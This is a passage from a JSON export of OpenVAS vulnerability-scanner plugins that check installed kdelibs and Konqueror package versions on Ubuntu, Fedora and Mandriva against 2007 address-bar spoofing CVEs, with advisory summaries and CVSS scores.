\"ssh/login/packages\");\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"UBUNTU6.06 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"kdelibs-bin\", ver:\"3.5.2-0ubuntu18.3\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"kdelibs-dbg\", ver:\"3.5.2-0ubuntu18.3\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"kdelibs4-dev\", ver:\"3.5.2-0ubuntu18.3\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"kdelibs4c2a\", ver:\"3.5.2-0ubuntu18.3\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"kdelibs-data\", ver:\"3.5.2-0ubuntu18.3\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"kdelibs4-doc\", ver:\"3.5.2-0ubuntu18.3\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"kdelibs\", ver:\"3.5.2-0ubuntu18.3\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU6.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"kdelibs-dbg\", ver:\"3.5.5-0ubuntu3.1.1\", rls:\"UBUNTU6.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"kdelibs4-dev\", ver:\"3.5.5-0ubuntu3.1.1\", rls:\"UBUNTU6.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"kdelibs4c2a\", ver:\"3.5.5-0ubuntu3.1.1\", rls:\"UBUNTU6.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"kdelibs-data\", ver:\"3.5.5-0ubuntu3.1.1\", rls:\"UBUNTU6.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"kdelibs4-doc\", ver:\"3.5.5-0ubuntu3.1.1\", rls:\"UBUNTU6.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"kdelibs\", ver:\"3.5.5-0ubuntu3.1.1\", rls:\"UBUNTU6.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU5.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"kdelibs-bin\", ver:\"3.4.3-0ubuntu2.3\", rls:\"UBUNTU5.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"kdelibs4-dev\", ver:\"3.4.3-0ubuntu2.3\", rls:\"UBUNTU5.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"kdelibs4c2-dbg\", ver:\"3.4.3-0ubuntu2.3\", rls:\"UBUNTU5.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"kdelibs4c2\", ver:\"3.4.3-0ubuntu2.3\", rls:\"UBUNTU5.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"kdelibs-data\", ver:\"3.4.3-0ubuntu2.3\", rls:\"UBUNTU5.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"kdelibs4-doc\", ver:\"3.4.3-0ubuntu2.3\", rls:\"UBUNTU5.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"kdelibs\", ver:\"3.4.3-0ubuntu2.3\", rls:\"UBUNTU5.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-07-25T10:57:01", "bulletinFamily": "scanner", "cvelist": ["CVE-2007-4224", "CVE-2007-4225", "CVE-2007-3820"], "description": "Check for the Version of kdelibs", "modified": "2017-07-10T00:00:00", "published": "2009-02-27T00:00:00", "id": "OPENVAS:861439", "href": "http://plugins.openvas.org/nasl.php?oid=861439", "type": "openvas", "title": "Fedora Update for kdelibs FEDORA-2007-1699", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for kdelibs FEDORA-2007-1699\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"kdelibs on Fedora 7\";\ntag_insight = \"Libraries for the K Desktop Environment:\n KDE Libraries included: kdecore (KDE core library), kdeui (user interface),\n kfm (file manager), khtmlw (HTML widget), kio (Input/Output, networking),\n kspell (spelling checker), jscript (javascript), kab (addressbook),\n kimgio (image manipulation).\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"https://www.redhat.com/archives/fedora-package-announce/2007-August/msg00316.html\");\n script_id(861439);\n script_version(\"$Revision: 6623 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:10:20 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-02-27 15:48:41 +0100 (Fri, 27 Feb 2009)\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_xref(name: \"FEDORA\", value: \"2007-1699\");\n script_cve_id(\"CVE-2007-3820\", \"CVE-2007-4224\", \"CVE-2007-4225\");\n script_name( \"Fedora Update for kdelibs FEDORA-2007-1699\");\n\n script_summary(\"Check for the Version of kdelibs\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC7\")\n{\n\n if ((res = isrpmvuln(pkg:\"kdelibs\", rpm:\"kdelibs~3.5.7~20.fc7\", rls:\"FC7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kdelibs-apidocs\", rpm:\"kdelibs-apidocs~3.5.7~20.fc7\", rls:\"FC7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kdelibs-devel\", rpm:\"kdelibs-devel~3.5.7~20.fc7\", rls:\"FC7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kdelibs-debuginfo\", rpm:\"kdelibs-debuginfo~3.5.7~20.fc7\", rls:\"FC7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kdelibs\", rpm:\"kdelibs~3.5.7~20.fc7\", rls:\"FC7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kdelibs\", rpm:\"kdelibs~3.5.7~20.fc7\", rls:\"FC7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kdelibs-debuginfo\", rpm:\"kdelibs-debuginfo~3.5.7~20.fc7\", rls:\"FC7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kdelibs-apidocs\", rpm:\"kdelibs-apidocs~3.5.7~20.fc7\", rls:\"FC7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kdelibs-devel\", rpm:\"kdelibs-devel~3.5.7~20.fc7\", rls:\"FC7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-04-09T11:39:25", "bulletinFamily": "scanner", "cvelist": ["CVE-2007-4224", "CVE-2007-4225", "CVE-2007-3820"], "description": "Check for the Version of konqueror", "modified": "2018-04-06T00:00:00", "published": "2009-04-09T00:00:00", "id": "OPENVAS:1361412562310830171", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310830171", "type": "openvas", "title": "Mandriva Update for konqueror MDKSA-2007:176 (konqueror)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Mandriva Update for konqueror MDKSA-2007:176 (konqueror)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"konqueror/konq_combo.cc in Konqueror 3.5.7 allows remote attackers\n to spoof the data: URI scheme in the address bar via a long URI with\n trailing whitespace, which prevents the beginning of the URI from\n being displayed. (CVE-2007-3820)\n\n KDE Konqueror 3.5.7 allows remote attackers to spoof the URL address\n bar by calling setInterval with a small interval and changing the\n window.location property. (CVE-2007-4224)\n \n Visual truncation vulnerability in KDE Konqueror 3.5.7 allows remote\n attackers to spoof the URL address bar via an http URI with a large\n amount of whitespace in the user/password portion. (CVE-2007-4225)\n \n Updated packages fix these issues.\";\n\ntag_affected = \"konqueror on Mandriva Linux 2007.0,\n Mandriva Linux 2007.0/X86_64,\n Mandriva Linux 2007.1,\n Mandriva Linux 2007.1/X86_64\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.mandriva.com/security-announce/2007-09/msg00004.php\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.830171\");\n script_version(\"$Revision: 9370 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 10:53:14 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-04-09 13:57:01 +0200 (Thu, 09 Apr 2009)\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_xref(name: \"MDKSA\", value: \"2007:176\");\n script_cve_id(\"CVE-2007-3820\", \"CVE-2007-4224\", \"CVE-2007-4225\");\n script_name( \"Mandriva Update for konqueror MDKSA-2007:176 (konqueror)\");\n\n script_tag(name:\"summary\", value:\"Check for the Version of konqueror\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/release\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"MNDK_2007.1\")\n{\n\n if ((res = isrpmvuln(pkg:\"kdebase\", rpm:\"kdebase~3.5.6~34.2mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kdebase-common\", rpm:\"kdebase-common~3.5.6~34.2mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kdebase-kate\", rpm:\"kdebase-kate~3.5.6~34.2mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kdebase-kdeprintfax\", rpm:\"kdebase-kdeprintfax~3.5.6~34.2mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kdebase-kdm\", rpm:\"kdebase-kdm~3.5.6~34.2mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kdebase-kmenuedit\", rpm:\"kdebase-kmenuedit~3.5.6~34.2mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kdebase-konsole\", rpm:\"kdebase-konsole~3.5.6~34.2mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kdebase-nsplugins\", rpm:\"kdebase-nsplugins~3.5.6~34.2mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kdebase-progs\", rpm:\"kdebase-progs~3.5.6~34.2mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kdebase-session-plugins\", rpm:\"kdebase-session-plugins~3.5.6~34.2mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kdelibs-common\", rpm:\"kdelibs-common~3.5.6~11.2mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kdelibs-devel-doc\", rpm:\"kdelibs-devel-doc~3.5.6~11.2mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libkdebase4\", rpm:\"libkdebase4~3.5.6~34.2mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libkdebase4-devel\", rpm:\"libkdebase4-devel~3.5.6~34.2mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libkdebase4-kate\", rpm:\"libkdebase4-kate~3.5.6~34.2mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libkdebase4-kate-devel\", rpm:\"libkdebase4-kate-devel~3.5.6~34.2mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libkdebase4-kmenuedit\", rpm:\"libkdebase4-kmenuedit~3.5.6~34.2mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libkdebase4-konsole\", rpm:\"libkdebase4-konsole~3.5.6~34.2mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libkdecore4\", rpm:\"libkdecore4~3.5.6~11.2mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libkdecore4-devel\", rpm:\"libkdecore4-devel~3.5.6~11.2mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kdelibs\", rpm:\"kdelibs~3.5.6~11.2mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64kdebase4\", rpm:\"lib64kdebase4~3.5.6~34.2mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64kdebase4-devel\", rpm:\"lib64kdebase4-devel~3.5.6~34.2mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64kdebase4-kate\", rpm:\"lib64kdebase4-kate~3.5.6~34.2mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64kdebase4-kate-devel\", rpm:\"lib64kdebase4-kate-devel~3.5.6~34.2mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64kdebase4-kmenuedit\", rpm:\"lib64kdebase4-kmenuedit~3.5.6~34.2mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64kdebase4-konsole\", rpm:\"lib64kdebase4-konsole~3.5.6~34.2mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64kdecore4\", rpm:\"lib64kdecore4~3.5.6~11.2mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64kdecore4-devel\", rpm:\"lib64kdecore4-devel~3.5.6~11.2mdv2007.1\", rls:\"MNDK_2007.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"MNDK_2007.0\")\n{\n\n if ((res = isrpmvuln(pkg:\"kdebase\", rpm:\"kdebase~3.5.4~35.4mdv2007.0\", rls:\"MNDK_2007.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kdebase-common\", rpm:\"kdebase-common~3.5.4~35.4mdv2007.0\", rls:\"MNDK_2007.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kdebase-kate\", rpm:\"kdebase-kate~3.5.4~35.4mdv2007.0\", rls:\"MNDK_2007.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kdebase-kdeprintfax\", rpm:\"kdebase-kdeprintfax~3.5.4~35.4mdv2007.0\", rls:\"MNDK_2007.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kdebase-kdm\", rpm:\"kdebase-kdm~3.5.4~35.4mdv2007.0\", rls:\"MNDK_2007.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kdebase-kmenuedit\", rpm:\"kdebase-kmenuedit~3.5.4~35.4mdv2007.0\", rls:\"MNDK_2007.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kdebase-konsole\", rpm:\"kdebase-konsole~3.5.4~35.4mdv2007.0\", rls:\"MNDK_2007.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kdebase-nsplugins\", rpm:\"kdebase-nsplugins~3.5.4~35.4mdv2007.0\", rls:\"MNDK_2007.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kdebase-progs\", rpm:\"kdebase-progs~3.5.4~35.4mdv2007.0\", rls:\"MNDK_2007.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kdelibs-common\", rpm:\"kdelibs-common~3.5.4~19.6mdv2007.0\", rls:\"MNDK_2007.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kdelibs-devel-doc\", rpm:\"kdelibs-devel-doc~3.5.4~19.6mdv2007.0\", rls:\"MNDK_2007.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libkdebase4\", rpm:\"libkdebase4~3.5.4~35.4mdv2007.0\", rls:\"MNDK_2007.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libkdebase4-devel\", rpm:\"libkdebase4-devel~3.5.4~35.4mdv2007.0\", rls:\"MNDK_2007.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libkdebase4-kate\", rpm:\"libkdebase4-kate~3.5.4~35.4mdv2007.0\", rls:\"MNDK_2007.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libkdebase4-kate-devel\", rpm:\"libkdebase4-kate-devel~3.5.4~35.4mdv2007.0\", rls:\"MNDK_2007.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libkdebase4-kmenuedit\", rpm:\"libkdebase4-kmenuedit~3.5.4~35.4mdv2007.0\", rls:\"MNDK_2007.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libkdebase4-konsole\", rpm:\"libkdebase4-konsole~3.5.4~35.4mdv2007.0\", rls:\"MNDK_2007.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libkdecore4\", rpm:\"libkdecore4~3.5.4~19.6mdv2007.0\", rls:\"MNDK_2007.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libkdecore4-devel\", rpm:\"libkdecore4-devel~3.5.4~19.6mdv2007.0\", rls:\"MNDK_2007.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kdelibs\", rpm:\"kdelibs~3.5.4~19.6mdv2007.0\", rls:\"MNDK_2007.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64kdebase4\", rpm:\"lib64kdebase4~3.5.4~35.4mdv2007.0\", rls:\"MNDK_2007.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64kdebase4-devel\", rpm:\"lib64kdebase4-devel~3.5.4~35.4mdv2007.0\", rls:\"MNDK_2007.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64kdebase4-kate\", rpm:\"lib64kdebase4-kate~3.5.4~35.4mdv2007.0\", rls:\"MNDK_2007.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64kdebase4-kate-devel\", rpm:\"lib64kdebase4-kate-devel~3.5.4~35.4mdv2007.0\", rls:\"MNDK_2007.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64kdebase4-kmenuedit\", rpm:\"lib64kdebase4-kmenuedit~3.5.4~35.4mdv2007.0\", rls:\"MNDK_2007.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64kdebase4-konsole\", rpm:\"lib64kdebase4-konsole~3.5.4~35.4mdv2007.0\", rls:\"MNDK_2007.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64kdecore4\", rpm:\"lib64kdecore4~3.5.4~19.6mdv2007.0\", rls:\"MNDK_2007.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64kdecore4-devel\", rpm:\"lib64kdecore4-devel~3.5.4~19.6mdv2007.0\", rls:\"MNDK_2007.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-12-04T11:29:11", "bulletinFamily": "scanner", "cvelist": ["CVE-2007-4224", "CVE-2007-4225", "CVE-2007-3820"], "description": "Ubuntu Update for Linux kernel vulnerabilities USN-502-1", "modified": "2017-12-01T00:00:00", "published": "2009-03-23T00:00:00", "id": "OPENVAS:840169", "href": "http://plugins.openvas.org/nasl.php?oid=840169", "type": "openvas", "title": "Ubuntu Update for kdebase, kdelibs vulnerabilities USN-502-1", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_502_1.nasl 7969 2017-12-01 09:23:16Z santu $\n#\n# Ubuntu Update for kdebase, kdelibs vulnerabilities USN-502-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"It was discovered that Konqueror could be tricked into displaying\n incorrect URLs. Remote attackers could exploit this to increase their\n chances of tricking a user into visiting a phishing URL, which could\n lead to credential theft.\";\n\ntag_summary = \"Ubuntu Update for Linux kernel vulnerabilities USN-502-1\";\ntag_affected = \"kdebase, kdelibs vulnerabilities on Ubuntu 6.06 LTS ,\n Ubuntu 6.10 ,\n Ubuntu 7.04\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name: \"URL\" , value: \"http://www.ubuntu.com/usn/usn-502-1/\");\n script_id(840169);\n script_version(\"$Revision: 7969 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-01 10:23:16 +0100 (Fri, 01 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-03-23 10:59:50 +0100 (Mon, 23 Mar 2009)\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_xref(name: \"USN\", value: \"502-1\");\n script_cve_id(\"CVE-2007-3820\", 